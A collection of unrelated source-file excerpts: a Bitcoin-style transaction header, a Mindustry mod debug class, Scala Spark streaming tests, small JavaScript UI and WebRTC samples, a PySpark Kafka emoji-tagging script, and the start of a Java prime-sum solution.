CTxIn(uint256 hashPrevTx, uint32_t nOut, CScript scriptSigIn=CScript(), uint32_t nSequenceIn=~(uint32_t)0);
ADD_SERIALIZE_METHODS;
template <typename Stream, typename Operation>
inline void SerializationOp(Stream& s, Operation ser_action, int nType, int nVersion) {
bool fWitness = (nVersion & SERIALIZE_VERSION_MASK_NO_WITNESS) == 0;
bool fOnlyWitness = nVersion & SERIALIZE_VERSION_MASK_ONLY_WITNESS;
assert((nType != SER_GETHASH && !fOnlyWitness && fWitness) || nType == SER_GETHASH);
if (!fOnlyWitness) READWRITE(prevout);
if (fWitness) READWRITE(scriptSig);
if (!fOnlyWitness) READWRITE(nSequence);
}
friend bool operator==(const CTxIn& a, const CTxIn& b)
{
return (a.prevout == b.prevout &&
a.scriptSig == b.scriptSig &&
a.nSequence == b.nSequence);
}
friend bool operator!=(const CTxIn& a, const CTxIn& b)
{
return !(a == b);
}
std::string ToString() const;
};
/** An output of a transaction. It contains the public key that the next input
* must be able to sign with to claim it.
*/
class CTxOut
{
public:
CTxOutValue nValue;
CScript scriptPubKey;
CTxOut()
{
SetNull();
}
CTxOut(const CTxOutValue& valueIn, CScript scriptPubKeyIn);
ADD_SERIALIZE_METHODS;
template <typename Stream, typename Operation>
inline void SerializationOp(Stream& s, Operation ser_action, int nType, int nVersion) {
READWRITE(nValue);
READWRITE(scriptPubKey);
}
void SetNull()
{
nValue = CTxOutValue();
scriptPubKey.clear();
}
bool IsNull() const
{
return nValue.IsNull() && scriptPubKey.empty();
}
bool IsDust(CFeeRate minRelayTxFee) const
{
if (!nValue.IsAmount())
return false; // FIXME
// "Dust" is defined in terms of CTransaction::minRelayTxFee,
// which has units satoshis-per-kilobyte.
// If you'd pay more than 1/3 in fees
// to spend something, then we consider it dust.
// A typical txout is 34 bytes big, and will
// need a CTxIn of at least 148 bytes to spend:
// so dust is a txout less than 546 satoshis
// with default minRelayTxFee.
size_t nSize = GetSerializeSize(SER_DISK,0)+148u;
return (nValue.GetAmount() < 3*minRelayTxFee.GetFee(nSize));
}
friend bool operator==(const CTxOut& a, const CTxOut& b)
{
return (a.nValue == b.nValue &&
a.scriptPubKey == b.scriptPubKey);
}
friend bool operator!=(const CTxOut& a, const CTxOut& b)
{
return !(a == b);
}
std::string ToString() const;
};
struct CMutableTransaction;
/** The basic transaction that is broadcasted on the network and contained in
* blocks. A transaction can contain multiple inputs and outputs.
*/
class CTransaction
{
private:
/** Memory only. */
const uint256 hash;
const uint256 hashWitness; // Just witness
const uint256 hashFull; // Including witness
const uint256 hashBitcoin; // For Bitcoin Transactions
void UpdateHash() const;
public:
static const int32_t CURRENT_VERSION=1;
// The local variables are made const to prevent unintended modification
// without updating the cached hash value. However, CTransaction is not
// actually immutable; deserialization and assignment are implemented,
// and bypass the constness. This is safe, as they update the entire
// structure, including the hash.
const int32_t nVersion;
const std::vector<CTxIn> vin;
const CAmount nTxFee;
const std::vector<CTxOut> vout;
const uint32_t nLockTime;
/** Construct a CTransaction that qualifies as IsNull() */
CTransaction();
/** Convert a CMutableTransaction into a CTransaction. */
CTransaction(const CMutableTransaction &tx);
CTransaction& operator=(const CTransaction& tx);
ADD_SERIALIZE_METHODS;
template <typename Stream, typename Operation>
inline void SerializationOp(Stream& s, Operation ser_action, int nType, int nVersion) {
bool fWitness = (nVersion & SERIALIZE_VERSION_MASK_NO_WITNESS) == 0;
bool fOnlyWitness = nVersion & SERIALIZE_VERSION_MASK_ONLY_WITNESS;
bool fBitcoinTx = nVersion & SERIALIZE_VERSION_MASK_BITCOIN_TX;
assert(!fBitcoinTx || (fBitcoinTx && fWitness && !fOnlyWitness));
assert((nType != SER_GETHASH && !fOnlyWitness && fWitness) || nType == SER_GETHASH);
if (!fOnlyWitness) READWRITE(*const_cast<int32_t*>(&this->nVersion));
READWRITE(*const_cast<std::vector<CTxIn>*>(&vin));
if (!fBitcoinTx && !fOnlyWitness) READWRITE(*const_cast<CAmount*>(&nTxFee));
if (!fOnlyWitness) READWRITE(*const_cast<std::vector<CTxOut>*>(&vout));
if (!fOnlyWitness) READWRITE(*const_cast<uint32_t*>(&nLockTime));
if (ser_action.ForRead())
UpdateHash();
}
bool IsNull() const {
return vin.empty() && vout.empty();
}
/* Transaction hash without witness information */
const uint256& GetHash() const {
return hash;
}
/* Transaction hash including witness information */
const uint256& GetFullHash() const {
return hashFull;
}
/* Hash of just witness information */
const uint256& GetWitnessHash() const {
return hashWitness;
}
/* Transaction hash including witness information */
const uint256& GetBitcoinHash() const {
assert(hashBitcoin != 0);
return hashBitcoin;
}
// Compute priority, given priority of inputs and (optionally) tx size
double ComputePriority(double dPriorityInputs, unsigned int nTxSize=0) const;
// Compute modified tx size for priority calculation (optionally given tx size)
unsigned int CalculateModifiedSize(unsigned int nTxSize=0) const;
bool IsCoinBase() const
{
return (vin.size() == 1 && vin[0].prevout.IsNull());
}
friend bool operator==(const CTransaction& a, const CTransaction& b)
{
return a.hash == b.hash;
}
friend bool operator!=(const CTransaction& a, const CTransaction& b)
{
return a.hash != b.hash;
}
std::string ToString() const;
};
/** A mutable version of CTransaction. */
struct CMutableTransaction
{
int32_t nVersion;
std::vector<CTxIn> vin;
CAmount nTxFee;
std::vector<CTxOut> vout;
uint32_t nLockTime;
CMutableTransaction();
CMutableTransaction(const CTransaction& tx);
ADD_SERIALIZE_METHODS;
template <typename Stream, typename Operation>
inline void SerializationOp(Stream& s, Operation ser_action, int nType, int nVersion) {
bool fWitness = (nVersion & SERIALIZE_VERSION_MASK_NO_WITNESS) == 0;
bool fOnlyWitness = nVersion & SERIALIZE_VERSION_MASK_ONLY_WITNESS;
bool fBitcoinTx = nVersion & SERIALIZE_VERSION_MASK_BITCOIN_TX;
assert(!fBitcoinTx);
assert((nType != SER_GETHASH && !fOnlyWitness && fWitness) || nType == SER_GETHASH);
if (!fOnlyWitness) READWRITE(this->nVersion);
READWRITE(vin);
if (!fOnlyWitness) READWRITE(nTxFee);
if (!fOnlyWitness) READWRITE(vout);
if (!fOnlyWitness) READWRITE(nLockTime);
}
bool IsCoinBase() const
{
return (vin.size() == 1 && vin[0].prevout.IsNull());
}
/** Compute the hash of this CMutableTransaction. This is computed on the
* fly, as opposed to GetHash() in CTransaction, which uses a cached result.
*/
uint256 GetHash() const;
};
#endif // BITCOIN_PRIMITIVES_TRANSACTION_H
|
package z.debug;
import arc.Events;
import arc.math.Mathf;
import arc.math.geom.Position;
import mindustry.Vars;
import mindustry.content.Fx;
import mindustry.entities.Effects;
import mindustry.entities.type.BaseUnit;
import mindustry.game.EventType;
import mindustry.type.UnitType;
import mindustry.world.Tile;
import z.ai.components.Squad;
import static mindustry.Vars.player;
import static mindustry.Vars.systemStrategy;
import static mindustry.Vars.tilesize;
/**
*
*/
public class ZDebug {
public static boolean d_input = true;
/** 禁用回合多余单位死亡*/
public static boolean disableWaveKill = true;
public static boolean debug_blockdraw = true;
/** 禁用单位规避碰撞*/
public static boolean disable_avoidOthers = false;
/** 关闭阴影绘制和迷雾绘制*/
public static boolean disable_draw = true;
/** 关闭地图边界移动限制*/
public static boolean disable_worldBoundCheck = true;
/** 关闭原版地板绘制*/
public static boolean disable_floorRender = false;
/** 关闭地图静态墙体绘制*/
public static boolean disable_staticWallRender = false;
/** 开启斜45地板开发绘制*/
public static boolean enable_floorDebug = false;
/** 开启权倾天下背景绘制*/
public static boolean enable_qqtxbackImg = false;
/** 禁止单位超出地图最大极限范围死亡*/
public static boolean disable_unitOutboundDead = true;
/** 禁止原版块排序*/
public static boolean disable_blockSort = true;
/** 使用斜45输入事件处理*/
public static boolean enable_isoInput = true;
/** 建筑使用自定义图标*/
public static boolean enable_customIco = false;
/** 禁用敌人出生点施加作用力*/
public static boolean disable_spawnslimit = true;
/** 禁用原版建造时间消耗初始化*/
public static boolean disable_buildcost = true;
/** 开启所有实体绘制*/
public static boolean enable_drawAllEntity = true;
/** 禁用出生点死亡警告*/
public static boolean disable_spawnWarn = true;
/** 禁用使用弹药(无限弹药)*/
public static boolean disable_ammo = true;
/** 禁止随机矿石生成*/
public static boolean disable_randomOre = true;
/** 使用自定义建造时间消耗*/
public static boolean enable_customBuildCost = true;
/** 禁用物品过滤*/
public static boolean disable_itemFilter = true;
/** 临时代码禁用缓存绘制*/
public static boolean disable_cacheDraw = false;
/** 禁用原版生命闪烁状态条*/
public static boolean disable_lifebar = true;
/** 强制添加物品入空余槽*/
public static boolean forceAddItem = false;
/** 禁用单位携带物品*/
public static boolean disable_carryItem = true;
/** 自定义显示状态条*/
public static boolean enable_customBar = true;
/** 立即完成Block升级进度*/
public static boolean enable_accomplish = false;
/** 使用默认生成单位数据*/
public static boolean enable_defaultWave = true;
/**开启单位碰撞绘制*/
public static boolean enable_drawUnitCollision = false;
/** 开启子弹碰撞绘制*/
public static boolean enable_drawBulletCollision = true;
/** 开启最上图层调试绘制*/
public static boolean enable_drawDebug = true;
/** 所有瓦砾均可通行, 不区分队伍和永久静态块*/
public static boolean enable_allPassable = true;
/** 加载xml配置文件科技树*/
public static boolean enable_xmlTechTree = true;
/** 禁止加载qqtx数据包,提高开发运行速度*/
public static boolean disable_packLoad = false;
/** 开启编辑器斜45绘制*/
public static boolean enable_editorIso = true;
/** 禁止mindustry游戏结束检测*/
public static boolean disable_mindustryEndCheck = true;
/** 隐藏mindustry玩家角色*/
public static boolean disable_mindustryPlayer = true;
/** 调试绘制Player位置*/
public static boolean debug_drawPlayer = true;
/** 开启脚本文件加载*/
public static boolean enable_scriptLoader = true;
/** 开启阴影绘制*/
public static boolean enable_shadowDraw = true;
/** 使用纹理倾斜绘制阴影(暗黑2阴影绘制)*/
public static boolean use_shadowTrans = true;
/** 禁用Mindustry退出保存*/
public static boolean disable_exitSave = true;
/** 开启移除所有游戏存档文件*/
public static boolean enable_removeSaves = false;
// 文件创建调试布尔begon
/** 科技树xml文件创建*/
public static boolean create_TechTreeXmlFile = false;
// 文件创建调试布尔end
// 路径数据 begon
public static String techTreeFile = "F:\\Develop\\workspace\\libgdx\\zones\\Public\\DiabloTown\\SanGuoTD\\core\\assets-raw\\zonesAdd\\createFile\\techTree.xml";
// 路径数据 end
/**
* 测试方法指定位置添加单位
* */
public static void addUnit(float x, float y, UnitType unitType) {
if (Vars.state.launched || Vars.state.gameOver) {
return;
}
Effects.shake(2f, 3f, new Position() {
@Override
public float getX() {
return x;
}
@Override
public float getY() {
return y;
}
});
Effects.effect(Fx.producesmoke, x, y);
Tile createTile = Vars.world.ltileWorld(x, y);
if (createTile == null) return;
BaseUnit unit = unitType.create(Vars.player.getTeam());
unit.setSpawner(createTile);
// unit.setAnimationData(Core.assets.get("debug/worker/worker.paper2dsprites", AniData.class));
if (enable_isoInput) {
unit.set(createTile.getX() + Mathf.range(4f / tilesize), createTile.getY() + Mathf.range(4f / tilesize));
} else {
unit.set(createTile.drawxIso() + Mathf.range(4), createTile.drawyIso() + Mathf.range(4));
}
unit.add();
// unit.velocity().y = factory.launchVelocity;
Events.fire(new EventType.UnitCreateEvent(unit));
{ // 队伍数据
Squad<BaseUnit> mySquad = systemStrategy.getSquad(player.getTeam(), 0);
// if (mySquad == null) {
// mySquad = new Squad<BaseUnit>();
//
// Vec2 targetPos = mySquad.getTarget().getPosition();
// Tile selected = world.tileWorld(targetPos.x, targetPos.y);
//// indexer.moveIndexer = selected;
// }
mySquad.addMember(unit);
}
}
// temp test code begon
// public static Squad<BaseUnit> mySquad;
// temp test code end
}
|
<reponame>carpaltunnel/metalus
package com.acxiom.pipeline.streaming
import com.acxiom.pipeline._
import com.acxiom.pipeline.connectors.{DataConnectorUtilities, HDFSDataConnector}
import com.acxiom.pipeline.steps.{DataFrameReaderOptions, DataFrameWriterOptions, FlowUtilsSteps, Schema}
import org.apache.commons.io.FileUtils
import org.apache.hadoop.fs.FileSystem
import org.apache.hadoop.hdfs.{HdfsConfiguration, MiniDFSCluster}
import org.apache.log4j.{Level, Logger}
import org.apache.spark.SparkConf
import org.apache.spark.sql.functions.lit
import org.apache.spark.sql.{DataFrame, SparkSession}
import org.scalatest.{BeforeAndAfterAll, FunSpec}
import java.io.{File, OutputStreamWriter}
import java.net.{ServerSocket, Socket}
import java.nio.file.{Files, Path}
import java.util.Date
import scala.concurrent.duration.Duration
import scala.concurrent.{Await, ExecutionContext, Future}
import scala.util.Random
class StreamingTests extends FunSpec with BeforeAndAfterAll {
implicit val executionContext: ExecutionContext = ExecutionContext.Implicits.global
private val MASTER = "local[2]"
private val APPNAME = "spark-streaming-steps-spark"
private var sparkConf: SparkConf = _
private var sparkSession: SparkSession = _
private val sparkLocalDir: Path = Files.createTempDirectory("sparkLocal")
private var pipelineContext: PipelineContext = _
var config: HdfsConfiguration = _
var fs: FileSystem = _
var miniCluster: MiniDFSCluster = _
val file = new File(sparkLocalDir.toFile.getAbsolutePath, "cluster")
override def beforeAll(): Unit = {
Logger.getLogger("org.apache.spark").setLevel(Level.WARN)
Logger.getLogger("org.apache.hadoop").setLevel(Level.WARN)
Logger.getLogger("com.acxiom.pipeline").setLevel(Level.DEBUG)
// set up mini hadoop cluster
config = new HdfsConfiguration()
config.set(MiniDFSCluster.HDFS_MINIDFS_BASEDIR, file.getAbsolutePath)
miniCluster = new MiniDFSCluster.Builder(config).build()
miniCluster.waitActive()
// Only pull the fs object from the mini cluster
fs = miniCluster.getFileSystem
sparkConf = new SparkConf()
.setMaster(MASTER)
.setAppName(APPNAME)
.set("spark.local.dir", sparkLocalDir.toFile.getAbsolutePath)
// Force Spark to use the HDFS cluster
.set("spark.hadoop.fs.defaultFS", miniCluster.getFileSystem().getUri.toString)
sparkSession = SparkSession.builder().config(sparkConf).getOrCreate()
pipelineContext = PipelineContext(Some(sparkConf), Some(sparkSession), Some(Map[String, Any]()),
PipelineSecurityManager(),
PipelineParameters(List(PipelineParameter("0", Map[String, Any]()), PipelineParameter("1", Map[String, Any]()))),
Some(List("com.acxiom.pipeline.steps")),
PipelineStepMapper(),
Some(DefaultPipelineListener()),
Some(sparkSession.sparkContext.collectionAccumulator[PipelineStepMessage]("stepMessages")))
}
override def afterAll(): Unit = {
sparkSession.sparkContext.cancelAllJobs()
sparkSession.sparkContext.stop()
sparkSession.stop()
miniCluster.shutdown()
Logger.getRootLogger.setLevel(Level.INFO)
// cleanup spark directories
FileUtils.deleteDirectory(sparkLocalDir.toFile)
}
describe("Streaming Monitor") {
it("Should run a continuous stream") {
// Output path
val path = miniCluster.getURI + "/metalus/data/socket_continuous.parquet"
// 3 second timeout
val ctx = pipelineContext.setGlobal("STREAMING_QUERY_TIMEOUT_MS", "5000")
val port = Random.nextInt(Constants.ONE_HUNDRED) + Constants.NINE_THOUSAND
// Input
val load = getReadStream(port, None)
// Output
val writeOptions = DataFrameWriterOptions(saveMode = "append")
// Setup the server
val server = new ServerSocket(port)
// Start the query
val query = Some(DataConnectorUtilities.buildDataStreamWriter(load, writeOptions, path).start())
// Write Data
val socket = sendRecords(server, Constants.FIVE * Constants.TEN)
// Thread the step
val future = Future {
FlowUtilsSteps.monitorStreamingQuery(query, None, ctx)
}
val f = Await.ready(future, Duration.Inf)
assert(f.isCompleted)
socket.close()
// Verify that anything within the path is a file unless it is the _spark_metadata directory
fs.listStatus(new org.apache.hadoop.fs.Path(path)).foreach(status => {
assert(!status.isDirectory || status.getPath.toString == s"$path/_spark_metadata")
})
val hdfs = HDFSDataConnector("TestConnector", None, None)
val df = hdfs.load(Some(path), ctx)
assert(df.count() == 50)
}
it("Should run a batch partitioned stream") {
// Output path
val path = miniCluster.getURI + "/metalus/data/socket_partitioned.parquet"
val checkpointLocation = s"${miniCluster.getURI}/metalus/data/streaming_partitioned_checkpoint"
val ctx = pipelineContext.setGlobal("STREAMING_BATCH_MONITOR_TYPE", "count")
.setGlobal("STREAMING_BATCH_MONITOR_COUNT", Constants.TEN)
.setGlobal("STREAMING_BATCH_PARTITION_TEMPLATE", "date")
.setGlobal("STREAMING_BATCH_PARTITION_GLOBAL", "PARTITION_VALUE")
.setGlobal("PARTITION_VALUE", Constants.FILE_APPEND_DATE_FORMAT.format(new Date()))
val port = Random.nextInt(Constants.ONE_HUNDRED) + Constants.NINE_THOUSAND
// Output
val writeOptions = DataFrameWriterOptions(saveMode = "append", partitionBy = Some(List("partition_column")),
options = Some(Map("checkpointLocation" -> checkpointLocation)))
// Setup the server
val server = new ServerSocket(port)
val dataFrame = getReadStream(port, Some("partition_column"), Some(Constants.FILE_APPEND_DATE_FORMAT.format(new Date())))
// Start the query
val query = Some(DataConnectorUtilities.buildDataStreamWriter(dataFrame, writeOptions, path).start())
// Write Data
val socket = sendRecords(server, Constants.TEN)
val monitor = Some("com.acxiom.pipeline.streaming.BatchPartitionedStreamingQueryMonitor")
// Thread the step
val future = Future {
val response = FlowUtilsSteps.monitorStreamingQuery(query, monitor, ctx)
socket.close()
assert(fs.exists(new org.apache.hadoop.fs.Path(checkpointLocation)))
// Verify that everything within the path is a directory
fs.listStatus(new org.apache.hadoop.fs.Path(path)).foreach(status => {
assert(status.isDirectory)
})
if (response.primaryReturn.getOrElse("continue") == "continue") {
// Delete the data because socket source doesn't have offsets
fs.delete(new org.apache.hadoop.fs.Path(path), true)
fs.delete(new org.apache.hadoop.fs.Path(checkpointLocation), true)
val q1 = Some(DataConnectorUtilities.buildDataStreamWriter(
getReadStream(port, Some("partition_column"),
Some(Constants.FILE_APPEND_DATE_FORMAT.format(new Date()))), writeOptions, path).start())
val s1 = sendRecords(server, Constants.TWENTY)
val r = FlowUtilsSteps.monitorStreamingQuery(q1, monitor, ctx)
s1.close()
r
} else {
response
}
}
val f = Await.ready(future, Duration.Inf)
assert(f.isCompleted)
server.close()
// Verify that everything within the path is a directory
fs.listStatus(new org.apache.hadoop.fs.Path(path)).foreach(status => {
assert(status.isDirectory)
})
assert(fs.exists(new org.apache.hadoop.fs.Path(checkpointLocation)))
val hdfs = HDFSDataConnector("TestConnector", None, None)
val readOptions = DataFrameReaderOptions(schema = Some(Schema.fromStructType(dataFrame.schema)))
val df = hdfs.load(Some(path), ctx, readOptions)
assert(df.count() == Constants.TWENTY)
}
it("Should run a batch file stream") {
// Output path
val path = miniCluster.getURI + "/metalus/data/socket_file.parquet"
val checkpointLocation = s"${miniCluster.getURI}/metalus/data/streaming_file_checkpoint"
val ctx = pipelineContext.setGlobal("STREAMING_BATCH_MONITOR_TYPE", "count")
.setGlobal("STREAMING_BATCH_MONITOR_COUNT", Constants.TEN)
.setGlobal("STREAMING_BATCH_OUTPUT_TEMPLATE", "date")
.setGlobal("STREAMING_BATCH_OUTPUT_GLOBAL", "destinationPath")
.setGlobal("STREAMING_BATCH_OUTPUT_PATH_KEY", "socket_file")
.setGlobal("destinationPath", path)
val port = Random.nextInt(Constants.ONE_HUNDRED) + Constants.NINE_THOUSAND
// Output
val writeOptions = DataFrameWriterOptions(saveMode = "append",
options = Some(Map("checkpointLocation" -> checkpointLocation)))
// Setup the server
val server = new ServerSocket(port)
val dataFrame = getReadStream(port, None, None)
// Start the query
val query = Some(DataConnectorUtilities.buildDataStreamWriter(dataFrame, writeOptions, path).start())
// Write Data
val socket = sendRecords(server, Constants.TEN)
val monitor = Some("com.acxiom.pipeline.streaming.BatchFileStreamingQueryMonitor")
// Thread the step
val future = Future {
FlowUtilsSteps.monitorStreamingQuery(query, monitor, ctx)
}
val f = Await.ready(future, Duration.Inf)
assert(f.isCompleted)
socket.close()
server.close()
// Verify that anything within the path is a file unless it is the _spark_metadata directory
fs.listStatus(new org.apache.hadoop.fs.Path(path)).foreach(status => {
assert(!status.isDirectory || status.getPath.toString == s"$path/_spark_metadata")
})
val response = f.value.get.get
assert(response.primaryReturn.getOrElse("continue") == "continue")
assert(response.namedReturns.isDefined)
assert(response.namedReturns.get.contains("$globals.destinationPath"))
val updatedPath = response.namedReturns.get("$globals.destinationPath").asInstanceOf[String]
assert(updatedPath.substring(updatedPath.lastIndexOf("/") + 1).length == 43)
assert(updatedPath.substring(updatedPath.lastIndexOf("/") + 1).startsWith("socket_file_"))
assert(updatedPath.substring(updatedPath.lastIndexOf("/") + 1).endsWith(".parquet"))
assert(fs.exists(new org.apache.hadoop.fs.Path(checkpointLocation)))
val hdfs = HDFSDataConnector("TestConnector", None, None)
val readOptions = DataFrameReaderOptions(schema = Some(Schema.fromStructType(dataFrame.schema)))
val df = hdfs.load(Some(path), ctx, readOptions)
assert(df.count() == Constants.TEN)
}
}
private def getReadStream(port: Int, partitionColumn: Option[String], paritionValue: Option[String] = None): DataFrame = {
val df = sparkSession.readStream.format("socket")
.option("host", "127.0.0.1").option("port", port).load()
if (partitionColumn.isDefined) {
df.withColumn(partitionColumn.get, lit(paritionValue.getOrElse("zero")))
} else {
df
}
}
private def sendRecords(server: ServerSocket, count: Int): Socket = {
val socket = server.accept()
val socketStream = socket.getOutputStream
val output = new OutputStreamWriter(socketStream)
(1 to count).toList.foreach(count => {
output.write(s"record$count\n")
})
output.flush()
output.close()
socket
}
}
|
class CommonButton {
constructor(buttonId) {
this.buttonId = buttonId;
this.isPressed = false;
}
}
class MMapMethods {
static register(device, callback) {
// Simulated memory-mapped interface registration
}
}
class DAL {
static BUTTON_ID_UP = 0;
static BUTTON_ID_ENTER = 1;
static BUTTON_ID_DOWN = 2;
static BUTTON_ID_RIGHT = 3;
static BUTTON_ID_LEFT = 4;
static BUTTON_ID_ESCAPE = 5;
}
class SimpleUI {
constructor() {
this.buttons = [
new CommonButton(DAL.BUTTON_ID_UP),
new CommonButton(DAL.BUTTON_ID_ENTER),
new CommonButton(DAL.BUTTON_ID_DOWN),
new CommonButton(DAL.BUTTON_ID_RIGHT),
new CommonButton(DAL.BUTTON_ID_LEFT),
new CommonButton(DAL.BUTTON_ID_ESCAPE)
];
this.buttonState = new Uint8Array(this.buttons.length).fill(0);
MMapMethods.register("/dev/lms_ui", this.handleMemoryMappedCallback.bind(this));
}
handleMemoryMappedCallback(data) {
// Simulated memory-mapped interface callback
this.buttonState = new Uint8Array(data);
}
handleButtonPress(buttonId) {
const button = this.buttons.find((btn) => btn.buttonId === buttonId);
if (button) {
button.isPressed = true;
this.updateButtonState();
}
}
updateButtonState() {
this.buttonState = this.buttons.map((btn) => (btn.isPressed ? 1 : 0));
}
getCurrentButtonState() {
return this.buttonState;
}
}
// Usage
const ui = new SimpleUI();
ui.handleButtonPress(DAL.BUTTON_ID_ENTER);
console.log(ui.getCurrentButtonState()); // Output: Uint8Array [0, 1, 0, 0, 0, 0] |
/*
* Copyright (c) 2020 The WebRTC project authors. All Rights Reserved.
*
* Use of this source code is governed by a BSD-style license
* that can be found in the LICENSE file in the root of the source
* tree.
*/
'use strict';
/**
* Sends a MediaStream to one end of an RTCPeerConnection and provides the
* remote end as the resulting MediaStream.
* In an actual video calling app, the two RTCPeerConnection objects would be
* instantiated on different devices. However, in this sample, both sides of the
* peer connection are local to allow the sample to be self-contained.
* For more detailed samples using RTCPeerConnection, take a look at
* https://webrtc.github.io/samples/.
*/
class PeerConnectionPipe { // eslint-disable-line no-unused-vars
/**
* @param {!MediaStream} inputStream stream to pipe over the peer connection
* @param {string} debugPath the path to this object from the debug global var
*/
constructor(inputStream, debugPath) {
/**
* @private @const {!RTCPeerConnection} the calling side of the peer
* connection, connected to inputStream_.
*/
this.caller_ = new RTCPeerConnection(null);
/**
* @private @const {!RTCPeerConnection} the answering side of the peer
* connection, providing the stream returned by getMediaStream.
*/
this.callee_ = new RTCPeerConnection(null);
/** @private {string} */
this.debugPath_ = debugPath;
/**
* @private @const {!Promise<!MediaStream>} the stream containing tracks
* from callee_, returned by getMediaStream.
*/
this.outputStreamPromise_ = this.init_(inputStream);
}
/**
* Sets the path to this object from the debug global var.
* @param {string} path
*/
setDebugPath(path) {
this.debugPath_ = path;
}
/**
* @param {!MediaStream} inputStream stream to pipe over the peer connection
* @return {!Promise<!MediaStream>}
* @private
*/
async init_(inputStream) {
console.log(
'[PeerConnectionPipe] Initiating peer connection.',
`${this.debugPath_} =`, this);
this.caller_.onicecandidate = (/** !RTCPeerConnectionIceEvent*/ event) => {
if (event.candidate) this.callee_.addIceCandidate(event.candidate);
};
this.callee_.onicecandidate = (/** !RTCPeerConnectionIceEvent */ event) => {
if (event.candidate) this.caller_.addIceCandidate(event.candidate);
};
const outputStream = new MediaStream();
const receiverStreamPromise = new Promise(resolve => {
this.callee_.ontrack = (/** !RTCTrackEvent */ event) => {
outputStream.addTrack(event.track);
if (outputStream.getTracks().length == inputStream.getTracks().length) {
resolve(outputStream);
}
};
});
inputStream.getTracks().forEach(track => {
this.caller_.addTransceiver(track, {direction: 'sendonly'});
});
await this.caller_.setLocalDescription();
await this.callee_.setRemoteDescription(
/** @type {!RTCSessionDescription} */ (this.caller_.localDescription));
await this.callee_.setLocalDescription();
await this.caller_.setRemoteDescription(
/** @type {!RTCSessionDescription} */ (this.callee_.localDescription));
await receiverStreamPromise;
console.log(
'[PeerConnectionPipe] Peer connection established.',
`${this.debugPath_}.caller_ =`, this.caller_,
`${this.debugPath_}.callee_ =`, this.callee_);
return receiverStreamPromise;
}
/**
* Provides the MediaStream that has been piped through a peer connection.
* @return {!Promise<!MediaStream>}
*/
getOutputStream() {
return this.outputStreamPromise_;
}
/** Frees any resources used by this object. */
destroy() {
console.log('[PeerConnectionPipe] Closing peer connection.');
this.caller_.close();
this.callee_.close();
}
}
|
<reponame>krisuety/Torchmoji_pyspark
from __future__ import print_function, division, unicode_literals
import example_helper
import json
import csv
import argparse
import numpy as np
import emoji
from torchmoji.sentence_tokenizer import SentenceTokenizer
from torchmoji.model_def import torchmoji_emojis
from torchmoji.global_variables import PRETRAINED_PATH, VOCAB_PATH
from pyspark.sql.functions import udf
from pyspark.sql.functions import col
#d = [{'content': 'This is shit'}, {'content': 'I love you'}]
from pyspark.sql.session import SparkSession
SPARK = SparkSession.builder.getOrCreate()
#df = SPARK.createDataFrame(d)
EMOJIS = ":joy: :unamused: :weary: :sob: :heart_eyes: \
:pensive: :ok_hand: :blush: :heart: :smirk: \
:grin: :notes: :flushed: :100: :sleeping: \
:relieved: :relaxed: :raised_hands: :two_hearts: :expressionless: \
:sweat_smile: :pray: :confused: :kissing_heart: :heartbeat: \
:neutral_face: :information_desk_person: :disappointed: :see_no_evil: :tired_face: \
:v: :sunglasses: :rage: :thumbsup: :cry: \
:sleepy: :yum: :triumph: :hand: :mask: \
:clap: :eyes: :gun: :persevere: :smiling_imp: \
:sweat: :broken_heart: :yellow_heart: :musical_note: :speak_no_evil: \
:wink: :skull: :confounded: :smile: :stuck_out_tongue_winking_eye: \
:angry: :no_good: :muscle: :facepunch: :purple_heart: \
:sparkling_heart: :blue_heart: :grimacing: :sparkles:".split(' ')
def top_elements(array, k):
ind = np.argpartition(array, -k)[-k:]
return ind[np.argsort(array[ind])][::-1]
with open(VOCAB_PATH, 'r') as f:
vocabulary = json.load(f)
st = SentenceTokenizer(vocabulary, 30)
model = torchmoji_emojis(PRETRAINED_PATH)
def sentence_to_emoji_fun(sentence):
# st = SentenceTokenizer(vocabulary, 30)
# model = torchmoji_emojis(PRETRAINED_PATH)
tokenized, _ ,_ = st.tokenize_sentences([sentence])
prob = model(tokenized)[0]
emoji_ids = top_elements(prob, 5)
# return emojis_ids.tolist()
emojis = map(lambda x: EMOJIS[x], emoji_ids)
#return emoji.emojize(emojis)
#return emoji.emojize("{} {}".format(sentence,' '.join(emojis)), use_aliases=True)
return emoji.emojize("{}".format(''.join(emojis)), use_aliases=True)
from pyspark.sql.types import StringType
get_emoji = udf(lambda s: sentence_to_emoji_fun(s), StringType())
import requests
import findspark
findspark.init()
import pyspark
from pyspark.sql import SparkSession
spark = SparkSession.builder.getOrCreate()
from pyspark.sql.types import *
from pyspark.sql.functions import *
spark.sparkContext.setLogLevel("ERROR")
kafka_df = spark.readStream.format("kafka").option("kafka.bootstrap.servers", "localhost:9092").option("subscribe", "test").load()
kafka_df_string = kafka_df.select(col("key").cast("STRING").alias("key"),col("value").cast("STRING").alias("value"))
kafka_df_string_2 = kafka_df_string.select(col("value"))
new = kafka_df_string_2.withColumn("emoji", get_emoji(kafka_df_string_2.value))
#result = kafka_df_string_2.select(get_emoji(col('value')))
#result = [r['<lambda>(content)'] for r in result]
#print(result)
output = new.writeStream.outputMode("append").format("console").option("truncate", "false").trigger(processingTime="3 seconds").start()
#output = result.writeStream.outputMode("append").format("console").option("truncate", "false").trigger(processingTime="3 seconds").start()
#def send_df_to_dashboard(df, id):
# tag = [str(t.value) for t in df.select("emoji").take(10)]
# url = 'http://localhost:8050/update_data'
# request_data = {'emoji' : str(emoji)} #request_data = {'tag': str(tag), 'tag_count': str(tag_count)}
# print('update dashboard')
# response = requests.post(url, data=request_data)
#new.writeStream.outputMode("complete").foreachBatch(send_df_to_dashboard).trigger(processingTime="3 seconds").start()
#def send_df_to_dashboard(df, id):
# tag = [str(t.value) for t in df.select("value").take(10)]
#url = 'http://localhost:8050/update_data'
#request_data = {'value' : str(value)} #request_data = {'tag': str(tag), 'tag_count': str(tag_count)}
#print('update dashboard')
#response = requests.post(url, data=request_data)
#kafka_df_string_2.writeStream.outputMode("complete").foreachBatch(send_df_to_dashboard).trigger(processingTime="3 seconds").start()
output.awaitTermination()
#result = df.select(get_emoji(col('content'))).collect()
#result = [r['<lambda>(content)'] for r in result]
#print(result)
|
module.exports = {
greeting: 'Hello Global Data!',
currentYear: new Date().getFullYear(),
};
|
package two_pointer;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.util.Arrays;
/**
*
* @author minchoba
* 백준 1644번: 소수의 연속합
*
* @see https://www.acmicpc.net/problem/1644/
*
*/
public class Boj1644 {
private static final int INF = 4_000_001;
private static boolean[] isPrime = new boolean[INF];
private static int[] seq = new int[INF];
private static int idx = 0;
